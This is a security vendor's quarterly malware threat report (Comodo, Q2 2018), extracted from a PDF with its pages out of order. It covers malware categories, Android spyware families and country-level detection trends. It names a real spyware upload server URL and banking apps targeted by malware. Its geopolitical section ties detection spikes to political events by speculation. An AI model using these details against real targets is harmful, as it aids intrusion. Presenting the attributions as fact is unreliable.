534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
